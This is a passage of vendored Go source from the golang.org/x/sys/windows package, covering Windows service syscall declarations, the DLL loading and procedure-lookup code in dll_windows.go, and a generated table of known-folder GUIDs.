LockDuration uint32 211 | } 212 | 213 | //sys CloseServiceHandle(handle Handle) (err error) = advapi32.CloseServiceHandle 214 | //sys CreateService(mgr Handle, serviceName *uint16, displayName *uint16, access uint32, srvType uint32, startType uint32, errCtl uint32, pathName *uint16, loadOrderGroup *uint16, tagId *uint32, dependencies *uint16, serviceStartName *uint16, password *uint16) (handle Handle, err error) [failretval==0] = advapi32.CreateServiceW 215 | //sys OpenService(mgr Handle, serviceName *uint16, access uint32) (handle Handle, err error) [failretval==0] = advapi32.OpenServiceW 216 | //sys DeleteService(service Handle) (err error) = advapi32.DeleteService 217 | //sys StartService(service Handle, numArgs uint32, argVectors **uint16) (err error) = advapi32.StartServiceW 218 | //sys QueryServiceStatus(service Handle, status *SERVICE_STATUS) (err error) = advapi32.QueryServiceStatus 219 | //sys QueryServiceLockStatus(mgr Handle, lockStatus *QUERY_SERVICE_LOCK_STATUS, bufSize uint32, bytesNeeded *uint32) (err error) = advapi32.QueryServiceLockStatusW 220 | //sys ControlService(service Handle, control uint32, status *SERVICE_STATUS) (err error) = advapi32.ControlService 221 | //sys StartServiceCtrlDispatcher(serviceTable *SERVICE_TABLE_ENTRY) (err error) = advapi32.StartServiceCtrlDispatcherW 222 | //sys SetServiceStatus(service Handle, serviceStatus *SERVICE_STATUS) (err error) = advapi32.SetServiceStatus 223 | //sys ChangeServiceConfig(service Handle, serviceType uint32, startType uint32, errorControl uint32, binaryPathName *uint16, loadOrderGroup *uint16, tagId *uint32, dependencies *uint16, serviceStartName *uint16, password *uint16, displayName *uint16) (err error) = advapi32.ChangeServiceConfigW 224 | //sys QueryServiceConfig(service Handle, serviceConfig *QUERY_SERVICE_CONFIG, bufSize uint32, bytesNeeded *uint32) (err error) = advapi32.QueryServiceConfigW 225 | //sys ChangeServiceConfig2(service Handle, infoLevel uint32, info *byte) (err error) = advapi32.ChangeServiceConfig2W 226 | //sys QueryServiceConfig2(service Handle, infoLevel uint32, buff *byte, buffSize uint32, bytesNeeded *uint32) (err error) = advapi32.QueryServiceConfig2W 227 | //sys EnumServicesStatusEx(mgr Handle, infoLevel uint32, serviceType uint32, serviceState uint32, services *byte, bufSize uint32, bytesNeeded *uint32, servicesReturned *uint32, resumeHandle *uint32, groupName *uint16) (err error) = advapi32.EnumServicesStatusExW 228 | //sys QueryServiceStatusEx(service Handle, infoLevel uint32, buff *byte, buffSize uint32, bytesNeeded *uint32) (err error) = advapi32.QueryServiceStatusEx 229 | //sys NotifyServiceStatusChange(service Handle, notifyMask uint32, notifier *SERVICE_NOTIFY) (ret error) = advapi32.NotifyServiceStatusChangeW 230 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/dll_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2011 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | import ( 8 | "sync" 9 | "sync/atomic" 10 | "syscall" 11 | "unsafe" 12 | ) 13 | 14 | // We need to use LoadLibrary and GetProcAddress from the Go runtime, because 15 | // the these symbols are loaded by the system linker and are required to 16 | // dynamically load additional symbols. Note that in the Go runtime, these 17 | // return syscall.Handle and syscall.Errno, but these are the same, in fact, 18 | // as windows.Handle and windows.Errno, and we intend to keep these the same. 19 | 20 | //go:linkname syscall_loadlibrary syscall.loadlibrary 21 | func syscall_loadlibrary(filename *uint16) (handle Handle, err Errno) 22 | 23 | //go:linkname syscall_getprocaddress syscall.getprocaddress 24 | func syscall_getprocaddress(handle Handle, procname *uint8) (proc uintptr, err Errno) 25 | 26 | // DLLError describes reasons for DLL load failures. 27 | type DLLError struct { 28 | Err error 29 | ObjName string 30 | Msg string 31 | } 32 | 33 | func (e *DLLError) Error() string { return e.Msg } 34 | 35 | // A DLL implements access to a single DLL. 36 | type DLL struct { 37 | Name string 38 | Handle Handle 39 | } 40 | 41 | // LoadDLL loads DLL file into memory. 42 | // 43 | // Warning: using LoadDLL without an absolute path name is subject to 44 | // DLL preloading attacks. To safely load a system DLL, use LazyDLL 45 | // with System set to true, or use LoadLibraryEx directly. 46 | func LoadDLL(name string) (dll *DLL, err error) { 47 | namep, err := UTF16PtrFromString(name) 48 | if err != nil { 49 | return nil, err 50 | } 51 | h, e := syscall_loadlibrary(namep) 52 | if e != 0 { 53 | return nil, &DLLError{ 54 | Err: e, 55 | ObjName: name, 56 | Msg: "Failed to load " + name + ": " + e.Error(), 57 | } 58 | } 59 | d := &DLL{ 60 | Name: name, 61 | Handle: h, 62 | } 63 | return d, nil 64 | } 65 | 66 | // MustLoadDLL is like LoadDLL but panics if load operation failes. 67 | func MustLoadDLL(name string) *DLL { 68 | d, e := LoadDLL(name) 69 | if e != nil { 70 | panic(e) 71 | } 72 | return d 73 | } 74 | 75 | // FindProc searches DLL d for procedure named name and returns *Proc 76 | // if found. It returns an error if search fails. 77 | func (d *DLL) FindProc(name string) (proc *Proc, err error) { 78 | namep, err := BytePtrFromString(name) 79 | if err != nil { 80 | return nil, err 81 | } 82 | a, e := syscall_getprocaddress(d.Handle, namep) 83 | if e != 0 { 84 | return nil, &DLLError{ 85 | Err: e, 86 | ObjName: name, 87 | Msg: "Failed to find " + name + " procedure in " + d.Name + ": " + e.Error(), 88 | } 89 | } 90 | p := &Proc{ 91 | Dll: d, 92 | Name: name, 93 | addr: a, 94 | } 95 | return p, nil 96 | } 97 | 98 | // MustFindProc is like FindProc but panics if search fails. 99 | func (d *DLL) MustFindProc(name string) *Proc { 100 | p, e := d.FindProc(name) 101 | if e != nil { 102 | panic(e) 103 | } 104 | return p 105 | } 106 | 107 | // FindProcByOrdinal searches DLL d for procedure by ordinal and returns *Proc 108 | // if found. It returns an error if search fails. 109 | func (d *DLL) FindProcByOrdinal(ordinal uintptr) (proc *Proc, err error) { 110 | a, e := GetProcAddressByOrdinal(d.Handle, ordinal) 111 | name := "#" + itoa(int(ordinal)) 112 | if e != nil { 113 | return nil, &DLLError{ 114 | Err: e, 115 | ObjName: name, 116 | Msg: "Failed to find " + name + " procedure in " + d.Name + ": " + e.Error(), 117 | } 118 | } 119 | p := &Proc{ 120 | Dll: d, 121 | Name: name, 122 | addr: a, 123 | } 124 | return p, nil 125 | } 126 | 127 | // MustFindProcByOrdinal is like FindProcByOrdinal but panics if search fails. 128 | func (d *DLL) MustFindProcByOrdinal(ordinal uintptr) *Proc { 129 | p, e := d.FindProcByOrdinal(ordinal) 130 | if e != nil { 131 | panic(e) 132 | } 133 | return p 134 | } 135 | 136 | // Release unloads DLL d from memory. 137 | func (d *DLL) Release() (err error) { 138 | return FreeLibrary(d.Handle) 139 | } 140 | 141 | // A Proc implements access to a procedure inside a DLL. 142 | type Proc struct { 143 | Dll *DLL 144 | Name string 145 | addr uintptr 146 | } 147 | 148 | // Addr returns the address of the procedure represented by p. 149 | // The return value can be passed to Syscall to run the procedure. 150 | func (p *Proc) Addr() uintptr { 151 | return p.addr 152 | } 153 | 154 | //go:uintptrescapes 155 | 156 | // Call executes procedure p with arguments a. It will panic, if more than 15 arguments 157 | // are supplied. 158 | // 159 | // The returned error is always non-nil, constructed from the result of GetLastError. 160 | // Callers must inspect the primary return value to decide whether an error occurred 161 | // (according to the semantics of the specific function being called) before consulting 162 | // the error. The error will be guaranteed to contain windows.Errno. 163 | func (p *Proc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) { 164 | switch len(a) { 165 | case 0: 166 | return syscall.Syscall(p.Addr(), uintptr(len(a)), 0, 0, 0) 167 | case 1: 168 | return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], 0, 0) 169 | case 2: 170 | return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], a[1], 0) 171 | case 3: 172 | return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], a[1], a[2]) 173 | case 4: 174 | return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], 0, 0) 175 | case 5: 176 | return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], 0) 177 | case 6: 178 | return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5]) 179 | case 7: 180 | return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], 0, 0) 181 | case 8: 182 | return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], 0) 183 | case 9: 184 | return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8]) 185 | case 10: 186 | return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], 0, 0) 187 | case 11: 188 | return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], 0) 189 | case 12: 190 | return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11]) 191 | case 13: 192 | return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], 0, 0) 193 | case 14: 194 | return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], a[13], 0) 195 | case 15: 196 | return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], a[13], a[14]) 197 | default: 198 | panic("Call " + p.Name + " with too many arguments " + itoa(len(a)) + ".") 199 | } 200 | } 201 | 202 | // A LazyDLL implements access to a single DLL. 203 | // It will delay the load of the DLL until the first 204 | // call to its Handle method or to one of its 205 | // LazyProc's Addr method. 206 | type LazyDLL struct { 207 | Name string 208 | 209 | // System determines whether the DLL must be loaded from the 210 | // Windows System directory, bypassing the normal DLL search 211 | // path. 212 | System bool 213 | 214 | mu sync.Mutex 215 | dll *DLL // non nil once DLL is loaded 216 | } 217 | 218 | // Load loads DLL file d.Name into memory. It returns an error if fails. 219 | // Load will not try to load DLL, if it is already loaded into memory. 220 | func (d *LazyDLL) Load() error { 221 | // Non-racy version of: 222 | // if d.dll != nil { 223 | if atomic.LoadPointer((*unsafe.Pointer)(unsafe.Pointer(&d.dll))) != nil { 224 | return nil 225 | } 226 | d.mu.Lock() 227 | defer d.mu.Unlock() 228 | if d.dll != nil { 229 | return nil 230 | } 231 | 232 | // kernel32.dll is special, since it's where LoadLibraryEx comes from. 233 | // The kernel already special-cases its name, so it's always 234 | // loaded from system32. 235 | var dll *DLL 236 | var err error 237 | if d.Name == "kernel32.dll" { 238 | dll, err = LoadDLL(d.Name) 239 | } else { 240 | dll, err = loadLibraryEx(d.Name, d.System) 241 | } 242 | if err != nil { 243 | return err 244 | } 245 | 246 | // Non-racy version of: 247 | // d.dll = dll 248 | atomic.StorePointer((*unsafe.Pointer)(unsafe.Pointer(&d.dll)), unsafe.Pointer(dll)) 249 | return nil 250 | } 251 | 252 | // mustLoad is like Load but panics if search fails. 253 | func (d *LazyDLL) mustLoad() { 254 | e := d.Load() 255 | if e != nil { 256 | panic(e) 257 | } 258 | } 259 | 260 | // Handle returns d's module handle. 261 | func (d *LazyDLL) Handle() uintptr { 262 | d.mustLoad() 263 | return uintptr(d.dll.Handle) 264 | } 265 | 266 | // NewProc returns a LazyProc for accessing the named procedure in the DLL d. 267 | func (d *LazyDLL) NewProc(name string) *LazyProc { 268 | return &LazyProc{l: d, Name: name} 269 | } 270 | 271 | // NewLazyDLL creates new LazyDLL associated with DLL file. 272 | func NewLazyDLL(name string) *LazyDLL { 273 | return &LazyDLL{Name: name} 274 | } 275 | 276 | // NewLazySystemDLL is like NewLazyDLL, but will only 277 | // search Windows System directory for the DLL if name is 278 | // a base name (like "advapi32.dll"). 279 | func NewLazySystemDLL(name string) *LazyDLL { 280 | return &LazyDLL{Name: name, System: true} 281 | } 282 | 283 | // A LazyProc implements access to a procedure inside a LazyDLL. 284 | // It delays the lookup until the Addr method is called. 285 | type LazyProc struct { 286 | Name string 287 | 288 | mu sync.Mutex 289 | l *LazyDLL 290 | proc *Proc 291 | } 292 | 293 | // Find searches DLL for procedure named p.Name. It returns 294 | // an error if search fails. Find will not search procedure, 295 | // if it is already found and loaded into memory. 296 | func (p *LazyProc) Find() error { 297 | // Non-racy version of: 298 | // if p.proc == nil { 299 | if atomic.LoadPointer((*unsafe.Pointer)(unsafe.Pointer(&p.proc))) == nil { 300 | p.mu.Lock() 301 | defer p.mu.Unlock() 302 | if p.proc == nil { 303 | e := p.l.Load() 304 | if e != nil { 305 | return e 306 | } 307 | proc, e := p.l.dll.FindProc(p.Name) 308 | if e != nil { 309 | return e 310 | } 311 | // Non-racy version of: 312 | // p.proc = proc 313 | atomic.StorePointer((*unsafe.Pointer)(unsafe.Pointer(&p.proc)), unsafe.Pointer(proc)) 314 | } 315 | } 316 | return nil 317 | } 318 | 319 | // mustFind is like Find but panics if search fails. 320 | func (p *LazyProc) mustFind() { 321 | e := p.Find() 322 | if e != nil { 323 | panic(e) 324 | } 325 | } 326 | 327 | // Addr returns the address of the procedure represented by p. 328 | // The return value can be passed to Syscall to run the procedure. 329 | // It will panic if the procedure cannot be found. 330 | func (p *LazyProc) Addr() uintptr { 331 | p.mustFind() 332 | return p.proc.Addr() 333 | } 334 | 335 | //go:uintptrescapes 336 | 337 | // Call executes procedure p with arguments a. It will panic, if more than 15 arguments 338 | // are supplied. It will also panic if the procedure cannot be found. 339 | // 340 | // The returned error is always non-nil, constructed from the result of GetLastError. 341 | // Callers must inspect the primary return value to decide whether an error occurred 342 | // (according to the semantics of the specific function being called) before consulting 343 | // the error. The error will be guaranteed to contain windows.Errno. 344 | func (p *LazyProc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) { 345 | p.mustFind() 346 | return p.proc.Call(a...) 347 | } 348 | 349 | var canDoSearchSystem32Once struct { 350 | sync.Once 351 | v bool 352 | } 353 | 354 | func initCanDoSearchSystem32() { 355 | // https://msdn.microsoft.com/en-us/library/ms684179(v=vs.85).aspx says: 356 | // "Windows 7, Windows Server 2008 R2, Windows Vista, and Windows 357 | // Server 2008: The LOAD_LIBRARY_SEARCH_* flags are available on 358 | // systems that have KB2533623 installed. To determine whether the 359 | // flags are available, use GetProcAddress to get the address of the 360 | // AddDllDirectory, RemoveDllDirectory, or SetDefaultDllDirectories 361 | // function. If GetProcAddress succeeds, the LOAD_LIBRARY_SEARCH_* 362 | // flags can be used with LoadLibraryEx." 363 | canDoSearchSystem32Once.v = (modkernel32.NewProc("AddDllDirectory").Find() == nil) 364 | } 365 | 366 | func canDoSearchSystem32() bool { 367 | canDoSearchSystem32Once.Do(initCanDoSearchSystem32) 368 | return canDoSearchSystem32Once.v 369 | } 370 | 371 | func isBaseName(name string) bool { 372 | for _, c := range name { 373 | if c == ':' || c == '/' || c == '\\' { 374 | return false 375 | } 376 | } 377 | return true 378 | } 379 | 380 | // loadLibraryEx wraps the Windows LoadLibraryEx function. 381 | // 382 | // See https://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx 383 | // 384 | // If name is not an absolute path, LoadLibraryEx searches for the DLL 385 | // in a variety of automatic locations unless constrained by flags. 386 | // See: https://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx 387 | func loadLibraryEx(name string, system bool) (*DLL, error) { 388 | loadDLL := name 389 | var flags uintptr 390 | if system { 391 | if canDoSearchSystem32() { 392 | const LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800 393 | flags = LOAD_LIBRARY_SEARCH_SYSTEM32 394 | } else if isBaseName(name) { 395 | // WindowsXP or unpatched Windows machine 396 | // trying to load "foo.dll" out of the system 397 | // folder, but LoadLibraryEx doesn't support 398 | // that yet on their system, so emulate it. 399 | systemdir, err := GetSystemDirectory() 400 | if err != nil { 401 | return nil, err 402 | } 403 | loadDLL = systemdir + "\\" + name 404 | } 405 | } 406 | h, err := LoadLibraryEx(loadDLL, 0, flags) 407 | if err != nil { 408 | return nil, err 409 | } 410 | return &DLL{Name: name, Handle: h}, nil 411 | } 412 | 413 | type errString string 414 | 415 | func (s errString) Error() string { return string(s) } 416 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/zknownfolderids_windows.go: -------------------------------------------------------------------------------- 1 | // Code generated by 'mkknownfolderids.bash'; DO NOT EDIT. 2 | 3 | package windows 4 | 5 | type KNOWNFOLDERID GUID 6 | 7 | var ( 8 | FOLDERID_NetworkFolder = &KNOWNFOLDERID{0xd20beec4, 0x5ca8, 0x4905, [8]byte{0xae, 0x3b, 0xbf, 0x25, 0x1e, 0xa0, 0x9b, 0x53}} 9 | FOLDERID_ComputerFolder = &KNOWNFOLDERID{0x0ac0837c, 0xbbf8, 0x452a, [8]byte{0x85, 0x0d, 0x79, 0xd0, 0x8e, 0x66, 0x7c, 0xa7}} 10 | FOLDERID_InternetFolder = &KNOWNFOLDERID{0x4d9f7874, 0x4e0c, 0x4904, [8]byte{0x96, 0x7b, 0x40, 0xb0, 0xd2, 0x0c, 0x3e, 0x4b}} 11 | FOLDERID_ControlPanelFolder = &KNOWNFOLDERID{0x82a74aeb, 0xaeb4, 0x465c, [8]byte{0xa0, 0x14, 0xd0, 0x97, 0xee, 0x34, 0x6d, 0x63}} 12 | FOLDERID_PrintersFolder = &KNOWNFOLDERID{0x76fc4e2d, 0xd6ad, 0x4519, [8]byte{0xa6, 0x63, 0x37, 0xbd, 0x56, 0x06, 0x81, 0x85}} 13 | FOLDERID_SyncManagerFolder = &KNOWNFOLDERID{0x43668bf8, 0xc14e, 0x49b2, [8]byte{0x97, 0xc9, 0x74, 0x77, 0x84, 0xd7, 0x84, 0xb7}} 14 | FOLDERID_SyncSetupFolder = &KNOWNFOLDERID{0x0f214138, 0xb1d3, 0x4a90, [8]byte{0xbb, 0xa9, 0x27, 0xcb, 0xc0, 0xc5, 0x38, 0x9a}} 15 | FOLDERID_ConflictFolder = &KNOWNFOLDERID{0x4bfefb45, 0x347d, 0x4006, [8]byte{0xa5, 0xbe, 0xac, 0x0c, 0xb0, 0x56, 0x71, 0x92}} 16 | FOLDERID_SyncResultsFolder = &KNOWNFOLDERID{0x289a9a43, 0xbe44, 0x4057, [8]byte{0xa4, 0x1b, 0x58, 0x7a, 0x76, 0xd7, 0xe7, 0xf9}} 17 | FOLDERID_RecycleBinFolder = &KNOWNFOLDERID{0xb7534046, 0x3ecb, 0x4c18, [8]byte{0xbe, 0x4e, 0x64, 0xcd, 0x4c, 0xb7, 0xd6, 0xac}} 18 | FOLDERID_ConnectionsFolder = &KNOWNFOLDERID{0x6f0cd92b, 0x2e97, 0x45d1, [8]byte{0x88, 0xff, 0xb0, 0xd1, 0x86, 0xb8, 0xde, 0xdd}} 19 | FOLDERID_Fonts = &KNOWNFOLDERID{0xfd228cb7, 0xae11, 0x4ae3, [8]byte{0x86, 0x4c, 0x16, 0xf3, 0x91, 0x0a, 0xb8, 0xfe}} 20 | FOLDERID_Desktop = &KNOWNFOLDERID{0xb4bfcc3a, 0xdb2c, 0x424c, [8]byte{0xb0, 0x29, 0x7f, 0xe9, 0x9a, 0x87, 0xc6, 0x41}} 21 | FOLDERID_Startup = &KNOWNFOLDERID{0xb97d20bb, 0xf46a, 0x4c97, [8]byte{0xba, 0x10, 0x5e, 0x36, 0x08, 0x43, 0x08, 0x54}} 22 | FOLDERID_Programs = &KNOWNFOLDERID{0xa77f5d77, 0x2e2b, 0x44c3, [8]byte{0xa6, 0xa2, 0xab, 0xa6, 0x01, 0x05, 0x4a, 0x51}} 23 | FOLDERID_StartMenu = &KNOWNFOLDERID{0x625b53c3, 0xab48, 0x4ec1, [8]byte{0xba, 0x1f, 0xa1, 0xef, 0x41, 0x46, 0xfc, 0x19}} 24 | FOLDERID_Recent = &KNOWNFOLDERID{0xae50c081, 0xebd2, 0x438a, [8]byte{0x86, 0x55, 0x8a, 0x09, 0x2e, 0x34, 0x98, 0x7a}} 25 | FOLDERID_SendTo = &KNOWNFOLDERID{0x8983036c, 0x27c0, 0x404b, [8]byte{0x8f, 0x08, 0x10, 0x2d, 0x10, 0xdc, 0xfd, 0x74}} 26 | FOLDERID_Documents = &KNOWNFOLDERID{0xfdd39ad0, 0x238f, 0x46af, [8]byte{0xad, 0xb4, 0x6c, 0x85, 0x48, 0x03, 0x69, 0xc7}} 27 | FOLDERID_Favorites = &KNOWNFOLDERID{0x1777f761, 0x68ad, 0x4d8a, [8]byte{0x87, 0xbd, 0x30, 0xb7, 0x59, 0xfa, 0x33, 0xdd}} 28 | FOLDERID_NetHood = &KNOWNFOLDERID{0xc5abbf53, 0xe17f, 0x4121, [8]byte{0x89, 0x00, 0x86, 0x62, 0x6f, 0xc2, 0xc9, 0x73}} 29 | FOLDERID_PrintHood = &KNOWNFOLDERID{0x9274bd8d, 0xcfd1, 0x41c3, [8]byte{0xb3, 0x5e, 0xb1, 0x3f, 0x55, 0xa7, 0x58, 0xf4}} 30 | FOLDERID_Templates = &KNOWNFOLDERID{0xa63293e8, 0x664e, 0x48db, [8]byte{0xa0, 0x79, 0xdf, 0x75, 0x9e, 0x05, 0x09, 0xf7}} 31 | FOLDERID_CommonStartup = &KNOWNFOLDERID{0x82a5ea35, 0xd9cd, 0x47c5, [8]byte{0x96, 0x29, 0xe1, 0x5d, 0x2f, 0x71, 0x4e, 0x6e}} 32 | FOLDERID_CommonPrograms = &KNOWNFOLDERID{0x0139d44e, 0x6afe, 0x49f2, [8]byte{0x86, 0x90, 0x3d, 0xaf, 0xca, 0xe6, 0xff, 0xb8}} 33 | FOLDERID_CommonStartMenu = &KNOWNFOLDERID{0xa4115719, 0xd62e, 0x491d, [8]byte{0xaa, 0x7c, 0xe7, 0x4b, 0x8b, 0xe3, 0xb0, 0x67}} 34 | FOLDERID_PublicDesktop = &KNOWNFOLDERID{0xc4aa340d, 0xf20f, 0x4863, [8]byte{0xaf, 0xef, 0xf8, 0x7e, 0xf2, 0xe6, 0xba, 0x25}} 35 | FOLDERID_ProgramData = &KNOWNFOLDERID{0x62ab5d82, 0xfdc1, 0x4dc3, [8]byte{0xa9, 0xdd, 0x07, 0x0d, 0x1d, 0x49, 0x5d, 0x97}} 36 | FOLDERID_CommonTemplates = &KNOWNFOLDERID{0xb94237e7, 0x57ac, 0x4347, [8]byte{0x91, 0x51, 0xb0, 0x8c, 0x6c, 0x32, 0xd1, 0xf7}} 37 | FOLDERID_PublicDocuments = &KNOWNFOLDERID{0xed4824af, 0xdce4, 0x45a8, [8]byte{0x81, 0xe2, 0xfc, 0x79, 0x65, 0x08, 0x36, 0x34}} 38 | FOLDERID_RoamingAppData = &KNOWNFOLDERID{0x3eb685db, 0x65f9, 0x4cf6, [8]byte{0xa0, 0x3a, 0xe3, 0xef, 0x65, 0x72, 0x9f, 0x3d}} 39 | FOLDERID_LocalAppData = &KNOWNFOLDERID{0xf1b32785, 0x6fba, 0x4fcf, [8]byte{0x9d, 0x55, 0x7b, 0x8e, 0x7f, 0x15, 0x70, 0x91}} 40 | FOLDERID_LocalAppDataLow = &KNOWNFOLDERID{0xa520a1a4, 0x1780, 0x4ff6, [8]byte{0xbd, 0x18, 0x16, 0x73, 0x43, 0xc5, 0xaf, 0x16}} 41 | FOLDERID_InternetCache = &KNOWNFOLDERID{0x352481e8, 0x33be, 0x4251, [8]byte{0xba, 0x85, 0x60, 0x07, 0xca, 0xed, 0xcf, 0x9d}} 42 | FOLDERID_Cookies = &KNOWNFOLDERID{0x2b0f765d, 0xc0e9, 0x4171, [8]byte{0x90, 0x8e, 0x08, 0xa6, 0x11, 0xb8, 0x4f, 0xf6}} 43 | FOLDERID_History = &KNOWNFOLDERID{0xd9dc8a3b, 0xb784, 0x432e, [8]byte{0xa7, 0x81, 0x5a, 0x11, 0x30, 0xa7, 0x59, 0x63}} 44 | FOLDERID_System = &KNOWNFOLDERID{0x1ac14e77, 0x02e7, 0x4e5d, [8]byte{0xb7, 0x44, 0x2e, 0xb1, 0xae, 0x51, 0x98, 0xb7}} 45 | FOLDERID_SystemX86 = &KNOWNFOLDERID{0xd65231b0, 0xb2f1, 0x4857, [8]byte{0xa4, 0xce, 0xa8, 0xe7, 0xc6, 0xea, 0x7d, 0x27}} 46 | FOLDERID_Windows = &KNOWNFOLDERID{0xf38bf404, 0x1d43, 0x42f2, [8]byte{0x93, 0x05, 0x67, 0xde, 0x0b, 0x28, 0xfc, 0x23}} 47 | FOLDERID_Profile = &KNOWNFOLDERID{0x5e6c858f, 0x0e22, 0x4760, [8]byte{0x9a, 0xfe, 0xea, 0x33, 0x17, 0xb6, 0x71, 0x73}} 48 | FOLDERID_Pictures = &KNOWNFOLDERID{0x33e28130, 0x4e1e, 0x4676, [8]byte{0x83, 0x5a, 0x98, 0x39, 0x5c, 0x3b, 0xc3, 0xbb}} 49 | FOLDERID_ProgramFilesX86 = &KNOWNFOLDERID{0x7c5a40ef, 0xa0fb, 0x4bfc, [8]byte{0x87, 0x4a, 0xc0, 0xf2, 0xe0, 0xb9, 0xfa, 0x8e}} 50 | FOLDERID_ProgramFilesCommonX86 = &KNOWNFOLDERID{0xde974d24, 0xd9c6, 0x4d3e, [8]byte{0xbf, 0x91, 0xf4, 0x45, 0x51, 0x20, 0xb9, 0x17}} 51 | FOLDERID_ProgramFilesX64 = &KNOWNFOLDERID{0x6d809377, 0x6af0, 0x444b, [8]byte{0x89, 0x57, 0xa3, 0x77, 0x3f, 0x02, 0x20, 0x0e}} 52 | FOLDERID_ProgramFilesCommonX64 = &KNOWNFOLDERID{0x6365d5a7, 0x0f0d, 0x45e5, [8]byte{0x87, 0xf6, 0x0d, 0xa5, 0x6b, 0x6a, 0x4f, 0x7d}} 53 | FOLDERID_ProgramFiles = &KNOWNFOLDERID{0x905e63b6, 0xc1bf, 0x494e, [8]byte{0xb2, 0x9c, 0x65, 0xb7, 0x32, 0xd3, 0xd2, 0x1a}} 54 | FOLDERID_ProgramFilesCommon = &KNOWNFOLDERID{0xf7f1ed05, 0x9f6d, 0x47a2, [8]byte{0xaa, 0xae, 0x29, 0xd3, 0x17, 0xc6, 0xf0, 0x66}} 55 | FOLDERID_UserProgramFiles = &KNOWNFOLDERID{0x5cd7aee2, 0x2219, 0x4a67, [8]byte{0xb8, 0x5d, 0x6c, 0x9c, 0xe1, 0x56, 0x60, 0xcb}} 56 | FOLDERID_UserProgramFilesCommon = &KNOWNFOLDERID{0xbcbd3057, 0xca5c, 0x4622, [8]byte{0xb4, 0x2d, 0xbc, 0x56, 0xdb, 0x0a, 0xe5, 0x16}} 57 | FOLDERID_AdminTools = &KNOWNFOLDERID{0x724ef170, 0xa42d, 0x4fef, [8]byte{0x9f, 0x26, 0xb6, 0x0e, 0x84, 0x6f, 0xba, 0x4f}} 58 | FOLDERID_CommonAdminTools = &KNOWNFOLDERID{0xd0384e7d, 0xbac3, 0x4797, [8]byte{0x8f, 0x14, 0xcb, 0xa2, 0x29, 0xb3, 0x92, 0xb5}} 59 | FOLDERID_Music = &KNOWNFOLDERID{0x4bd8d571, 0x6d19, 0x48d3, [8]byte{0xbe, 0x97, 0x42, 0x22, 0x20, 0x08, 0x0e, 0x43}} 60 | FOLDERID_Videos = &KNOWNFOLDERID{0x18989b1d, 0x99b5, 0x455b, [8]byte{0x84, 0x1c, 0xab, 0x7c, 0x74, 0xe4, 0xdd, 0xfc}} 61 | FOLDERID_Ringtones = &KNOWNFOLDERID{0xc870044b, 0xf49e, 0x4126, [8]byte{0xa9, 0xc3, 0xb5, 0x2a, 0x1f, 0xf4, 0x11, 0xe8}} 62 | FOLDERID_PublicPictures = &KNOWNFOLDERID{0xb6ebfb86, 0x6907, 0x413c, [8]byte{0x9a, 0xf7, 0x4f, 0xc2, 0xab, 0xf0, 0x7c, 0xc5}} 63 | FOLDERID_PublicMusic = &KNOWNFOLDERID{0x3214fab5, 0x9757, 0x4298, [8]byte{0xbb, 0x61, 0x92, 0xa9, 0xde, 0xaa, 0x44, 0xff}} 64 | FOLDERID_PublicVideos = &KNOWNFOLDERID{0x2400183a, 0x6185, 0x49fb, [8]byte{0xa2, 0xd8, 0x4a, 0x39, 0x2a, 0x60, 0x2b, 0xa3}} 65 | FOLDERID_PublicRingtones = &KNOWNFOLDERID{0xe555ab60, 0x153b, 0x4d17, [8]byte{0x9f, 0x04, 0xa5, 0xfe, 0x99, 0xfc, 0x15, 0xec}} 66 | FOLDERID_ResourceDir = &KNOWNFOLDERID{0x8ad10c31, 0x2adb, 0x4296, [8]byte{0xa8, 0xf7, 0xe4, 0x70, 0x12, 0x32, 0xc9, 0x72}} 67 | FOLDERID_LocalizedResourcesDir = &KNOWNFOLDERID{0x2a00375e, 0x224c, 0x49de, [8]byte{0xb8, 0xd1, 0x44, 0x0d, 0xf7, 0xef, 0x3d, 0xdc}} 68 | FOLDERID_CommonOEMLinks = &KNOWNFOLDERID{0xc1bae2d0, 0x10df, 0x4334, [8]byte{0xbe, 0xdd, 0x7a, 0xa2, 0x0b, 0x22, 0x7a, 0x9d}} 69 | FOLDERID_CDBurning = &KNOWNFOLDERID{0x9e52ab10, 0xf80d, 0x49df, [8]byte{0xac, 0xb8, 0x43, 0x30, 0xf5, 0x68, 0x78, 0x55}} 70 | FOLDERID_UserProfiles = &KNOWNFOLDERID{0x0762d272, 0xc50a, 0x4bb0, [8]byte{0xa3, 0x82, 0x69, 0x7d, 0xcd, 0x72, 0x9b, 0x80}} 71 | 